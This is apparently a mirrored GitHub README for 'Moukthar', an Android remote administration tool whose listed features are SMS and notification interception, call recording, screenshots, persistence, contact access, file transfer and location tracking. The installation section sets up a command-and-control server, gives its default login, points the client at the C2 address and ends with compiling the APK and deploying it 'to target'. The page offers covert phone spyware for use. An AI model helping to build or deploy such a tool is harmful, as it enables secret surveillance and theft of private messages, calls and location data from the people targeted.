H4xl0r / moukthar

Android remote administration tool

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Moukthar

Remote adminitration tool for android

Features

  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation

  • Clone repository
    git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Move server files to /var/www/html/ and install dependencies
    mv moukthar/Server/* /var/www/html/
    cd /var/www/html/c2-server
    composer install
    cd /var/www/html/web\ socket/
    composer install
    The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux
    php Server/web\ socket/App.php
    # OR
    sudo mv Server/websocket.service /etc/systemd/system/
    sudo systemctl daemon-reload
    sudo systemctl enable websocket.service
    sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf
      <Directory /var/www/html/c2-server>
          Options -Indexes
          DirectoryIndex app.php
          AllowOverride All
          Require all granted
      </Directory>
  • Set C2 server and web socket server address in client functionality/Utils.java
    public static final String C2_SERVER = "http://localhost";
    
    public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
  • Compile APK using Android Studio and deploy to target

Screenshots

Dashboard

TODO

  • Auto scroll logs on dashboard

About

Android remote administration tool

License:GNU General Public License v3.0


Languages

Language:PHP 56.8%Language:Java 31.1%Language:CSS 9.1%Language:Hack 1.7%Language:JavaScript 1.2%Language:Batchfile 0.0%